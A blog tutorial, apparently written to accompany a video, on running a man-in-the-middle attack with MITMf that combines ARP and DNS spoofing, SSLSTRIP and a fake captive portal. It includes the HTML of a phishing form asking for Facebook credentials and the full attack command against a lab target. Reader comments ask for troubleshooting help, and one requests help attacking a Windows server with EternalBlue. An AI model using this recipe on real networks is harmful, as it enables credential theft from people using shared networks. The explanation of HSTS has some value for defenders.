Using MITMF with SSLSTRIP and Captive Portal options

In this video we will try out a variation of the man-in-the-middle with SSLSTRIP attack that we performed previously.
In MITMF, in addition to ARP spoofing and SSLSTRIP, we will also be using the Captive Portal option.
Please review the videos listed below, if needed:
Bettercap with SSLSTRIP attack - Does it still work ?
SSLSTRIP attacks with Bettercap and MITMF - HSTS and Web browsers

We saw in the previous videos that websites correctly configured for HSTS can't be attacked using SSLSTRIP. On the other hand, at this moment, a lot of websites still don't use HSTS or have HSTS incorrectly configured, which leaves those websites vulnerable to man-in-the-middle and SSLSTRIP attacks.
Because it is unlikely for a user to browse ONLY correctly configured HSTS websites, an attacker can redirect the SSLSTRIP-vulnerable websites to a Captive Portal and trick the user into giving up credentials belonging to websites that can't be attacked directly (for example: social media credentials, email credentials, etc.).

Captive Portal

The test Captive Portal in the video is a very basic one which uses two files under the /var/www/html/form1 directory: index.html and welcome.php

index.html

<form action="welcome.php" method="post">
Please logon using your Facebook credentials in order to continue using our network:<br>
User: <input type="text" name="user"><br>
Password: <input type="text" name="pass"><br>
<input type="submit">
</form>

welcome.php

<html>
<body>
Enjoy tour browsing!
</body>
</html>

An attacker in a real scenario would make the Captive Portal webpage fancier and more convincing.

MITMF

MITMF can be installed from the Kali Linux repository, but in order to use the Captive Portal option, MITMF has to be installed from GitHub, from the following location: https://github.com/byt3bl33d3r/MITMf

The following MITMF command was used to initiate the man-in-the-middle attack using ARP spoofing, SSLSTRIP and Captive Portal options:

./mitmf.py -i eth0 --hsts --spoof --arp --dns --gateway 192.168.254.2 --targets 192.168.254.70 --captive --portalurl http://192.168.254.176/form1

Comments

  1. please help, error " python mitmf.py
    :0: UserWarning: You do not have a working installation of the service_identity module: 'cannot import name opentype'. Please install it from and make sure all of its dependencies are satisfied. Without the service_identity module, Twisted can perform only rudimentary TLS client hostname verification. Many valid certificate/hostname mappings may be rejected.
    Traceback (most recent call last):
    File "mitmf.py", line 36, in
    from plugins import *
    File "/root/programas/MITMf/plugins/filepwn.py", line 72, in
    from libs.bdfactory import pebin
    ImportError: No module named bdfactory "

  2. Replies
    1. Looks like you didn't install all the prerequisites ... ?

    2. How did you solve it? I have the same issue.

  3. Hi, how're you doing?... Well I have a problem hacking into a Windows Server 2012 R2... I'm using eternalblue. Plz show me how to do it

  4. my mitmf is not showing any captured traffic
